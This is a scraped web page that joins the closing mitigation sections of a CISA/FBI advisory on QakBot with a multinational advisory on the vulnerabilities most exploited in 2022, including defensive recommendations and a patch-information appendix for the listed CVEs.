CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Best Practice Mitigation Recommendations

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud) [CPG 2.O, 2.R, 5.A].
  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards when developing and managing password policies [CPG 2.B]. This includes:
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;
    • Store passwords in hashed format using industry-recognized password managers;
    • Add password user “salts” to shared login credentials;
    • Avoid reusing passwords;
    • Implement multiple failed login attempt account lockouts;
    • Disable password “hints”;
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities of internet-facing systems [CPG 1.E]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations’ internet-accessible assets. Organizations can email [email protected] with the subject line, “Requesting Cyber Hygiene Services” to get started.
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks to restrict adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated malware with a networking monitoring tool. To aid in detecting the malware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.D, 2.E].
  • Disable unused ports [CPG 2.V, 2.W, 2X].
  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.
  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task [CPG 2.E].
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
  • Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.

Ransomware Guidance

  • CISA.gov/stopransomware is a whole-of-government resource that serves as one central location for ransomware resources and alerts.
  • CISA, FBI, the National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) published an updated version of the #StopRansomware Guide, as ransomware actors have accelerated their tactics and techniques since its initial release in 2020.
  • CISA has released a new module in its Cyber Security Evaluation Tool (CSET), the Ransomware Readiness Assessment (RRA). CSET is a desktop software tool that guides network defenders through a step-by-step process to evaluate cybersecurity practices on their networks.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see MITRE ATT&CK’s page on QakBot).[9]
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.

RESOURCES

REFERENCES

  1. MITRE: Cobalt Strike
  2. MITRE: Conti
  3. MITRE: ProLock
  4. MITRE: Egregor
  5. MITRE: REvil
  6. MITRE: MegaCortex
  7. MITRE: Black Basta
  8. MITRE: Royal
  9. MITRE: QakBot

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

VERSION HISTORY

August 30, 2023: Initial version.

Source…

2022 Top Routinely Exploited Vulnerabilities


SUMMARY

The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):

  • United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
  • Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
  • Canada: Canadian Centre for Cyber Security (CCCS)
  • New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
  • United Kingdom: National Cyber Security Centre (NCSC-UK)

This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.

The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.

  • Vendors, designers, and developers: Implement secure-by-design and -default principles and tactics to reduce the prevalence of vulnerabilities in your software.
    • Follow the Secure Software Development Framework (SSDF), also known as SP 800-218, and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.
    • Prioritize secure-by-default configurations, such as eliminating default passwords, or requiring addition configuration changes to enhance product security.
    • Ensure that published CVEs include the proper CWE field identifying the root cause of the vulnerability.
  • End-user organizations:
    • Apply timely patches to systems. Note: First check for signs of compromise if CVEs identified in this CSA have not been patched.
    • Implement a centralized patch management system.
    • Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers.
    • Ask your software providers to discuss their secure by design program and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.

Download the PDF version of this report:

TECHNICAL DETAILS

Key Findings

In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.

Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).

Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.

Top Routinely Exploited Vulnerabilities

Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:

  • CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
  • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
  • CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
  • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
  • CVE-2021- 44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.
  • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
  • CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
  • CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
  • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

Additional Routinely Exploited Vulnerabilities

In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.

MITIGATIONS

Vendors and Developers

The authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:

  • Identify repeatedly exploited classes of vulnerability. Perform an analysis of both CVEs and known exploited vulnerabilities to understand which classes of vulnerability are identified more than others. Implement appropriate mitigations to eliminate those classes of vulnerability. For example, if a product has several instances of SQL injection vulnerabilities, ensure all database queries in the product use parameterized queries, and prohibit other forms of queries.
  • Ensure business leaders are responsible for security. Business leaders should ensure that proactive steps to eliminate entire classes of security vulnerabilities, rather than only making one-off patches when new vulnerabilities are discovered.
  • Follow the SSDF (SP 800-218) and implement secure design practices into each stage of the SDLC. Pay attention to:
    • Prioritizing the use of memory safe languages wherever possible [SSDF PW 6.1].
    • Exercising due diligence when selecting software components (e.g., software libraries, modules, middleware, frameworks) to ensure robust security in consumer software products [SSDF PW 4.1].
    • Setting up secure development team practices; this includes conducting peer code reviews, working to a common organization secure coding standard, and maintaining awareness of language specific security concerns [SSDF PW.5.1, PW.7.1, PW.7.2].
    • Establishing a vulnerability disclosure program to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization [SSDF RV.1.3]. As part of this, establish processes to determine root causes of discovered vulnerabilities.
    • Using static and dynamic application security testing (SAST/DAST) tools to analyze product source code and application behavior to detect error-prone practices [SSDF PW.7.2, PW.8.2].
    • Configuring production-ready products to have to most secure settings as default and providing guidance on the risks of changing each setting [SSDF PW.9.1, PW9.2]
  • Prioritize secure-by-default configurations such as eliminating default passwords, implementing single sign on (SSO) technology via modern open standards, and providing high-quality audit logs to customers with no additional configuration and at no extra charge.
  • Ensure published CVEs include the proper CWE field identifying the root cause of the vulnerability to enable industry-wide analysis of software security and design flaws.

For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.

End-User Organizations

The authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on CPGs, including additional recommended baseline protections.

Vulnerability and Configuration Management

  • Update software, operating systems, applications, and firmware on IT network assets in a timely manner [CPG 1.E]. Prioritize patching known exploited vulnerabilities, especially those CVEs identified in this CSA, then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix.
    • If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.
    • Replace end-of-life software (i.e., software no longer supported by the vendor).
  • Routinely perform automated asset discovery across the entire estate to identify and catalogue all the systems, services, hardware and software.
  • Implement a robust patch management process and centralized patch management system that establishes prioritization of patch applications [CPG 1.A].
    • Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications—such as webmail, file storage, file sharing, and chat and other employee collaboration tools—for their customers. However, MSPs and CSPs can expand their customer’s attack surface and may introduce unanticipated risks, so organizations should proactively collaborate with their MSPs and CSPs to jointly reduce risk [CPG 1.F]. For more information and guidance, see the following resources.
  • Document secure baseline configurations for all IT/OT components, including cloud infrastructure. Monitor, examine, and document any deviations from the initial secure baseline [CPG 2.O].
  • Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].
  • Maintain an updated cybersecurity incident response plan that is tested at least annually and updated within a risk informed time frame to ensure its effectiveness [CPG 2.S].

Identity and Access Management

  • Enforce phishing-resistant multifactor authentication (MFA) for all users, without exception. [CPG 2.H].
  • Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords [CPG 2.A, 2.B, 2.C, 2.D, 2.G].
  • Regularly review, validate, or remove privileged accounts (annually at a minimum) [CPG 2.D, 2.E].
  • Configure access control under the principle of least privilege [CPG 2.Q].

Protective Controls and Architecture

  • Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices [CPG 2.V, 2.W, 2X].
    • Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.
    • Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.
    • Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).
  • Implement Zero Trust Network Architecture (ZTNA) to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks [CPG 2.F, 2.X]. Note: See the Department of Defense’s Zero Trust Reference Architecture for additional information on Zero Trust.
  • Continuously monitor the attack surface and investigate abnormal activity that may indicate cyber actor or malware lateral movement [CPG 2.T].
    • Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure EDR, SIEM, vulnerability scanner, and other similar tools are reporting the same number of assets [CPG 2.T, 2.V].
    • Use web application firewalls to monitor and filter web traffic. These tools are commercially available via hardware, software, and cloud-based solutions, and may detect and mitigate exploitation attempts where a cyber actor sends a malicious web request to an unpatched device [CPG 2.B, 2.F].
    • Implement an administrative policy and/or automated process configured to monitor unwanted hardware, software, or programs against an allowlist with specified approved versions [CPG 2.Q].
    • Use a network protocol analyzer to examine captured data, including packet-level data.

Supply Chain Security

  • Reduce third-party applications and unique system/application builds—provide exceptions only if required to support business critical functions [CPG 2.Q].
  • Ensure contracts require vendors and/or third-party service providers to:
    • Provide notification of security incidents and vulnerabilities within a risk informed time frame [CPG 1.G, 1.H, 1.I].
    • Supply a Software Bill of Materials (SBOM) with all products to enhance vulnerability monitoring and to help reduce time to respond to identified vulnerabilities [CPG 4.B].
  • Ask your software providers to discuss their secure by design program and to provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.

RESOURCES

  • For information on the top vulnerabilities routinely exploited in 2016 through 2019, 2020, and 2021, see:
  • See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.
  • See ACSC’s Essential Eight mitigation strategies for additional mitigations.
  • See ACSC’s Cyber Supply Chain Risk Management for additional considerations and advice.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

PURPOSE

This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

REFERENCES

[1] Apache Log4j Vulnerability Guidance

VERSION HISTORY

August 3, 2023: Initial version.

APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES

CVE

Vendor

Affected Products and Versions

Patch Information

Resources

CVE-2017-0199

Microsoft

Multiple Products

Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows

 

CVE-2017-11882

Microsoft

Office, Multiple Versions

Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882

 

CVE-2018-13379

Fortinet

FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6

FortiProxy – system file leak through SSL VPN special crafted HTTP resource requests

Joint CSAs:

Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities

Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology

APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

CVE-2019-11510

Ivanti

Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12

SA44101 – 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX

CISA Alerts:

Continued Exploitation of Pulse Secure VPN Vulnerability

Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

ACSC Advisory:

2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software

Joint CSA:

APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

CCCS Alert:

APT Actors Target U.S. and Allied Networks – Update 1

CVE-2019-0708

Microsoft

Remote Desktop Services

Remote Desktop Services Remote Code Execution Vulnerability

 

CVE-2019-19781

Citrix

ADC and Gateway version 13.0 all supported builds before 13.0.47.24

NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12

SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b

CVE-2019-19781 – Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance

Joint CSAs:

APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

CCCS Alert:

Detecting Compromises relating to Citrix CVE-2019-19781

CVE-2020-5902

F5

BIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5

K52145254: TMUI RCE vulnerability CVE-2020-5902

CISA Alert:

Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902

CVE-2020-1472

Microsoft

Windows Server, Multiple Versions

Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472

ACSC Advisory:

2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)

Joint CSA:

APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

CCCS Alert:

Microsoft Netlogon Elevation of Privilege Vulnerability – CVE-2020-1472 – Update 1

CVE-2020-14882

Oracle

WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

Oracle Critical Patch Update Advisory – October 2020

 

CVE-2020-14883

Oracle

WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

Oracle Critical Patch Update Advisory – October 2020

 

CVE-2021-20016

SonicWALL

SSLVPN SMA100, Build Version 10.x

Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x

 

CVE-2021-26855

Microsoft

Exchange Server, Multiple Versions

Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855

CISA Alert:

Mitigate Microsoft Exchange Server Vulnerabilities

CVE-2021-26857 Microsoft Exchange Server, Multiple Versions Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857

CVE-2021-26858

Microsoft

Exchange Server, Multiple Versions

Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858

CISA Alert:

Mitigate Microsoft Exchange Server Vulnerabilities

CVE-2021-27065

Microsoft

Multiple Products

Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065

CISA Alert:

Mitigate Microsoft Exchange Server Vulnerabilities

CVE-2021-20021

SonicWALL

Email Security version 10.0.9.x Email Security

SonicWall Email Security pre-authentication administrative account creation vulnerability

 

CVE-2021-31207

Microsoft

Exchange Server, Multiple Versions

Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207

CISA Alert:

Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities

ACSC Alert:

Microsoft Exchange ProxyShell Targeting in Australia

CVE-2022-26134

Atlassian

Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1

Confluence Security Advisory 2022-06-02

CISA Alert:

CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog

ACSC Alert:

Remote code execution vulnerability present in Atlassian Confluence Server and Data Center

CVE-2021-34473

Microsoft

Exchange Server, Multiple Version

Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473

Joint CSA:

Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities

CVE-2021-34523

Microsoft

Microsoft Exchange Server 2013 Cumulative Update 23

Microsoft Exchange Server 2016 Cumulative Updates 19 and 20

Microsoft Exchange Server 2019 Cumulative Updates 8 and 9

Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523

CISA Alert:

Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities

CVE-2021-26084

Jira Atlassian

Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.

Jira Atlassian: Confluence Server Webwork OGNL injection – CVE-2021-26084

CISA Alert:

Atlassian Releases Security Updates for Confluence Server and Data Center

CVE-2021-40539

Zoho ManageEngineCorp.

ManageEngine ADSelfService Plus builds up to 6113

Security advisory – ADSelfService Plus authentication bypass vulnerability

ACSC Alert:

Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors

CVE-2021-40438

Apache

HTTP Server 2.4.48

   

CVE-2021-41773

Apache

Apache HTTP Server 2.4.49

Apache HTTP Server 2.4 vulnerabilities

 

CVE-2021-42013

Apache

Apache HTTP Server 2.4.50

Apache HTTP Server 2.4 vulnerabilities

 

CVE-2021-20038

SonicWall

SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24svSMA 100 series appliances

SonicWall patches multiple SMA100 affected vulnerabilities

ACSC Alert:

CCCS Alert:

SonicWall Security Advisory

CVE-2021- 44228

Apache

Log4j, all versions from 2.0-beta9 to 2.14.1

For other affected vendors and products, see CISA’s GitHub repository.

Apache Log4j Security Vulnerabilities

 

For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities

CISA webpage:

Apache Log4j Vulnerability Guidance

CCCS Alert:

Active exploitation of Apache Log4j vulnerability – Update 7

ACSC Advisory:

2021-007: Log4j vulnerability – advice and mitigations

ACSC Publication:

Log4j: What Boards and Directors Need to Know

CVE-2021-45046

Apache

Log4j 2.15.0Log4j

Apache Log4j Security Vulnerabilities

 

CVE-2022-42475

Fortinet

FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and

 

FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier

FortiOS – heap-based buffer overflow in sslvpnd

 

CVE-2022-24682

Zimbra

Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite

Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release

 

CVE-2022-22536

SAP

NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)

Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher

CISA Alert:

Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)

CVE-2022-22963

VMware Tanzumware Tanzu

Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions

CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression

 

CVE-2022-22954

VMware

Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0

 

 

Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3

vRealize Automation (vIDM), 8.x, 7.6

VMware Cloud Foundation (vIDM), 4.x

 

vRealize Suite Lifecycle Manager (vIDM), 8.xWorkspace

 

ONE Access and Identity Manager

VMware Advisory VMSA-2022-0011

 

CVE-2022-22960

VMware

Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0

Identity Manager (vIDM) and vRealize Automation3.3.6, 3.3.5, 3.3.4, 3.3.3

 

vRealize Automation (vIDM), 8.x, 7.6

 

VMware Cloud Foundation (vIDM), 4.x

 

VMware Cloud Foundation (vRA), 3.x

 

vRealize Suite Lifecycle Manager (vIDM), 8.x

VMSA-2022-0011

 

CVE-2022-29464

AtlassianWSO2

WSO2 API Manager 2.2.0 and above through 4.0.0

 

WSO2 Identity Server 5.2.0 and above through 5.11.0 

 

WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0

 

WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0

 

 WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0

WSO2 Documentation – Spaces

 

CVE-2022-27924

Zimbra

Zimbra Collaboration Suite, 8.8.15 and 9.0

Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release

 

CVE-2022-1388

F5 Networks

F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions

K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388

Joint CSA:

Threat Actors Exploiting F5 BIG-IP CVE-2022-1388

CVE-2022-30190

Microsoft

Exchange Server, Multiple Versions

 

CISA Alert:

Microsoft Releases Workaround Guidance for MSDT “Follina” Vulnerability

CVE-2022-22047

Microsoft

Multiple Products

